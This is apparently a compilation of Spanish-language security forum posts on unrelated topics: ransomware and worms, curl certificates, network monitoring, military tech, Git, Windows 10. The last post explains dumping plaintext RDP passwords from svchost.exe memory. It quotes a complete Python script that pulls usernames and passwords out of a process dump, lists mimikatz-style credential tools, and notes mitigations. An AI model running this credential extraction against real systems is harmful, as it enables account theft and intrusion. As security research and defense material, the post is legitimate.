Mensajes

Un pregunta como puedo compartir mi código (ransow) en python para que me alguien que sepa me de su opinión?

Repositorio privado en GitHub.

Un ransomware puede también tener la funciones de un gusano y desde un pc llegar a los servidores??

Si.  Muchos ransomware actuales tienen capacidad de gusano, de propagarse por toda la red.

Un ransomware cifra todo lo que pilla, sea unidades de red, pendrive conectado, todas las partes dónde tenga permiso de escritura.

Download the latest cacert.pem from https://curl.haxx.se/ca/cacert.pem

Add the following line to php.ini: (if this is shared hosting and you don't have access to php.ini then you could add this to .user.ini in public_html).

curl.cainfo="/path/to/downloaded/cacert.pem"

Make sure you enclose the path within double quotation marks!!!

I found out you need to download the .pem file here https://curl.haxx.se/docs/caextract.html

And add these settings...

curl_easy_setopt(curl, CURLOPT_SSL_VERIFYSTATUS, 1);           
curl_easy_setopt(curl, CURLOPT_CAINFO, "PATH TO FILE\\cacert.pem");
curl_easy_setopt(curl, CURLOPT_CAPATH, "PATH TO FILE\\cacert.pem");

¿Fuerza bruta a donde o a qué servicio? 

¿Estamos hablando de un servidor o de un ordenador personal?

Lo digo por si la conexión a internet es del proveedor ISP o de un datacenter.

Lo que tendrías que hacer es monitorizar de forma automatizada la conexión a internet.

Puedes usar algún servicio web gratuito tipo uptimerobot o similar, hay varios. Pero uptimerobot y otras gratuitas sólo permiten hacer ping cada 5 minutos. Lo ideal sería hacerlo cada minuto.

Es imposible saber si es un problema de red o es problema de internet, lo mejor es monitorizar y ver las caídas si tienen siempre la misma duración.

Monitoriza también el uso del tráfico de red del servidor, así podrás ver el gráfico de red.

¿Los micro-cortes que duración aproximada tienen?

Cuando vuelve la conexión, tiene picos muy altos de subida.

¿Picos muy altos de tráfico de subida (upload?

Sobre Tesla cabe recordar que su Auto Pilot es un asistente de conducción no un sistema de conducción autónoma.

Sobre el uso de las nuevas tecnologías en uso militar:

Traje Iron-Man

Militar holandés entrena con traje volador tipo "Iron Man"

[youtube=640,360]https://www.youtube.com/watch?v=M2KvlQKdBo8[/youtube]

- El traje Gravity #JetSuit utiliza más de 1.000 CV de potencia de motor a reacción
- Gravity, con sede en el Reino Unido, ha realizado más de 100 eventos de vuelo y conferencias en 30 países

Gafas Realidad Aumentada

Microsoft proporcionará al #ejército de los EE.UU sus gafas realidad aumentada HoloLens - Un contrato de 21.900 millones de dólares para la realidad aumentada de uso militar - Numerosas críticas trabajadores han solicitado se cancele el acuerdo

https://blogs.microsoft.com/blog/2021/03/31/army-moves-microsoft-hololens-based-headset-from-prototyping-to-production-phase/

Gafas de visión nocturna

Visión campo de batalla con gafas de visión nocturna y realidad aumentada del ejército de EEUU

Visión campo de batalla con las nuevas gafas de visión nocturna y realidad aumentada del ejército de EEUU

- ENVG-B (Enhanced Night Vision Goggle-Binoculars)  es una cámara termográfica permite reconocimiento de objetos

[youtube=640,360]https://www.youtube.com/watch?v=cbZkehkz76o[/youtube]

[Git]

Introducción a Git (Primera Parte)
https://foro.elhacker.net/programacion_general/introduccion_a_git_primera_parte-t507860.0.html

Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)
https://foro.elhacker.net/programacion_general/usando_git_para_manipular_el_directorio_de_trabajo_el_indice_y_commits_segunda_parte-t507983.0.html

Trabajando con las ramas de git (tercera parte)
https://foro.elhacker.net/programacion_general/trabajando_con_las_ramas_de_git_tercera_parte-t508174.0.html

[Diferencias entre versión Home y Professional Windows 10]

Que ventajas tiene Windows 10 premium al Windows 10 home?

Se puede instalar mediante ISO Windows 10 Premium, gratis?

Windows 10 premium no existe, será Windows Pro


Diferencias entre versión Home y Professional Windows 10
https://blog.elhacker.net/2020/11/activar-windows-10-licencia-digital-diferencias-entre-windows-10-home-y-professional-saber-version-build-instalada.html

Windows 10 Home vs Windows 10 Pro: cuales son las diferencias entre ambas versiones
https://www.xataka.com/basics/windows-10-home-vs-windows-10-pro-cuales-son-las-diferencias-entre-ambas-versiones

[Final de soporte para Windows 7 y "crypto" parche de seguridad para Windows 10]

Puedes actualizar a Windows 10 desde Windows 7 de forma totalmente gratuita conservando programas y documentos, además de la licencia original activada.

Con la herramienta que comentas: Windows Media Creation Tool
MediaCreationTool20H2.exe

https://go.microsoft.com/fwlink/?LinkId=691209

https://download.microsoft.com/download/4/c/c/4cc6c15c-75a5-4d1b-a3fe-140a5e09c9ff/MediaCreationTool20H2.exe

Cuando estás haciendo la actualización te pregunta si deseas conservar programas, documentos, etc.




Explicado aquí:

Final de soporte para Windows 7 y "crypto" parche de seguridad para Windows 10
https://blog.elhacker.net/2020/01/final-de-soporte-para-windows-7-y-importante-parche-seguridad-windows-10.html

Cuando acabes la instalación tendrás que cambiarte el nombre de usuario en el foro de win_7 a win_10  (es broma)   

¿De dónde has sacado o bajado la imagen ISO de Windows? Lo digo por si lo has descargado de algún sitio raro... pero si es cierto que ocupa casi 5GB e incluye todas las versiones (Home, Pro entre otras)

Diferencias entre versión Home y Professional
https://blog.elhacker.net/2020/11/activar-windows-10-licencia-digital-diferencias-entre-windows-10-home-y-professional-saber-version-build-instalada.html

La imagen ISO oficial de Windows 10 con todas las versiones ocupa unos 5GB creada con Windows Media Creation Tool
https://go.microsoft.com/fwlink/?LinkId=691209

La herramienta oficial crea y puede quemar la imagen ISO en un pendrive USB de 16GB sin ningún tipo de problema, no hace falta usar Rufus ni UltraIso ni ninguna otra herramienta. Se necesita un pendrive de mínimo 8GB.

¿El portátil con 4Gb de ram es procesador 32 o 64 bits? Es posible que hayas bajando un Windows 10 x64 y tu portátil sea 32 bits y por eso no pueda arrancar.



4 GB de RAM es memoria suficiente para instalar Windows 10, aunque no recomendable, ya es muy probable que vaya muy lento.

[Process Hacker]

Es posible extraer credenciales (usuario y contraseña) de inicio de sesión en texto plano en Windows escritorio remoto (RDP) del proceso de svchost.exe

Así lo ha descubierto el investigador Jonas, famoso recientemente por descubrir dos bugs (errores) en el sistema de archivos NTFS

Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html


Una simple búsqueda de cadena dentro de la memoria del proceso para svchost.exe revela la contraseña de texto sin formato que se utilizó para conectarse al sistema a través de RDP.

- La contraseña de texto sin formato está presente. La mayoría de los sistemas Windows modernos ya no tienen wdigest habilitado, por lo que encontrar credenciales de texto sin formato en la memoria es mucho más raro.
- La contraseña está en svchost.exe, a diferencia de lsass.exe. Esto significa que es posible que las herramientas defensivas para detectar / evitar el volcado de contraseñas de la memoria no puedan detectar esto.

Probé esto varias veces, así como muchas otras, y hasta ahora he observado lo siguiente:

- Esto parece funcionar en Windows 10, Windows Sever 2016, Windows Server 2012. Probablemente también en otros, pero hasta ahora lo he visto exitoso contra ellos.
- Según el autor del tweet y otros evaluadores, parece funcionar para cuentas locales y de dominio.
- No parece ser consistente. A veces, la contraseña está ahí, a veces no. No sé exactamente por qué es así. Parece existir en la memoria durante un largo período de tiempo, pero se desconoce cuánto tiempo.


Encuentra el proceso correcto. He visto algunas formas de hacerlo.

   Utilizando la herramienta Process Hacker 2. Ves a la pestaña Red y busca el proceso que tiene una conexión RDP. Esto solo funciona si la conexión RDP aún está activa.




Visto en:
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

El creador de la conocida herramienta mimikatz ha añadido recientemente la funcionalidad:



[youtube=640,360]https://www.youtube.com/watch?v=coBANSJhJnE[/youtube]

2.2.0 20210517 Terminal Server Passwords
https://github.com/gentilkiwi/mimikatz/releases

Mitigaciones:

Protect Remote Desktop credentials with Windows Defender Remote Credential Guard
https://docs.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard

Windows Defender Credential Guard: Requirements
https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements


Script Python
RDP_clear.py
https://gist.github.com/k4nfr3/ca2c392572da645661b62f9a71f28ba3

Código (python) [Seleccionar] Expandir

import re
from collections import namedtuple
import sys

# Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
# borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
# code inspired by  @gentilkiwi 's video
# This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
# I'm no dev so PR and constructive remarks are welcome


ASCII_BYTE = rb" !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t"

RDP_Strings = ['RDPDD', 'RDV::RDP::NetDetect::BandwidthChange']  #Server 2008 and Server 2016 tested only

String = namedtuple("String", ["s", "offset"])


def ascii_strings(buf, n=4):
   reg = rb"([%s]{%d,})" % (ASCII_BYTE, n)
   ascii_re = re.compile(reg)
   for match in ascii_re.finditer(buf):
       yield String(match.group().decode("ascii"), match.start())

def unicode_strings(buf, n=4):
   reg = rb"((?:[%s]\x00){%d,})" % (ASCII_BYTE, n)
   uni_re = re.compile(reg)
   for match in uni_re.finditer(buf):
       try:
           yield String(match.group().decode("utf-16"), match.start())
       except UnicodeDecodeError:
           pass


def getdomain(buf):
   return buf.decode("UTF-16)")

def banner():
   print(' _____ ____  _____           _             ')
   print('| __  |    \|  _  |      ___| |___ ___ ___ ')
   print('|    -|  |  |   __|     |  _| | -_| .\'|  _|')
   print('|__|__|____/|__|   _____|___|_|___|__,|_|  ')
   print('                  |_____|                  ')



def main():
   import sys

   SVCHOST = False
   Last1 = ""
   Last2 = ""
   Last3 = ""
   SERVERNAME=""
   with open(sys.argv[1], 'rb') as f:
       b = f.read()

   for s in ascii_strings(b, n=4):
       if format(s.s).find("svchost.exe -k termsvcs")!=-1:
           print('[*] Analyse of dump of process : {:s}'.format( s.s))
           SVCHOST = True
       if format(s.s).find("COMPUTERNAME=")!=-1:
           #print('[+] SERVERNAME : ' +s.s[13:])
           SERVERNAME=s.s[13:]
           break

   if (SVCHOST):
       print("\n")
       for s in unicode_strings(b):
           #print('[+] {:d} 0x{:d}: {:s}'.format(0,s.offset, s.s))

           if s.s in RDP_Strings:
               if (s.offset - Last1.offset) < 3000:
                   if (Last1.offset-Last2.offset==512):
                       #print('[+] User :{:d} 0x{:d}: {:s}'.format((s.offset - Last2.offset), Last2.offset, Last2.s))
                       print('[+] User : \t{:s}'.format(Last2.s))
                       #print('[+] Password : {:d} 0x{:d}: {:s}'.format((s.offset - Last1.offset), Last1.offset, Last1.s))
                       print('[+] Password : \t{:s}'.format(Last1.s))
                       if ((Last2.offset-Last3.offset) == 512) :
                           print('[+] Domain : \t{:d} 0x{:d}: {:s}'.format((s.offset - Last3.offset), Last3.offset, Last3.s))
                           break
                       else:
                           # bug in case string is less than 4 char
                           domain = b[Last2.offset-512:Last2.offset]
                           if getdomain(domain).strip('\x00')!="":
                               print('[+] Domain : \t{:s}'.format(getdomain(domain)))
                           else:  # can be empty, then it's local
                               print("[+] ServerName : \t"+SERVERNAME)
                           break

           Last3=Last2
           Last2=Last1
           Last1=s

   else:
       print(sys.argv[1] + " doesn't seem to be a svchost dump file")


if __name__ == "__main__":
   banner()
   if len(sys.argv) != 2:
       print("\n\nDump svchost process which listens to port 3389 port with any procdump tool")
       print("")
       print("Usage: " + sys.argv[0] + " svchost.dmp")
       exit(0)
   main()


Otras herramientas extracción credenciales en Windows

- mimikatz https://github.com/gentilkiwi/mimikatz
- Proyecto LaZagne https://github.com/AlessandroZ/LaZagne/
- Pypykatz (mimikatz) en Python https://github.com/skelsec/pypykatz
- Nishang (PowerShell) https://github.com/samratashok/nishang
- CrackMapExec CME https://github.com/byt3bl33d3r/CrackMapExec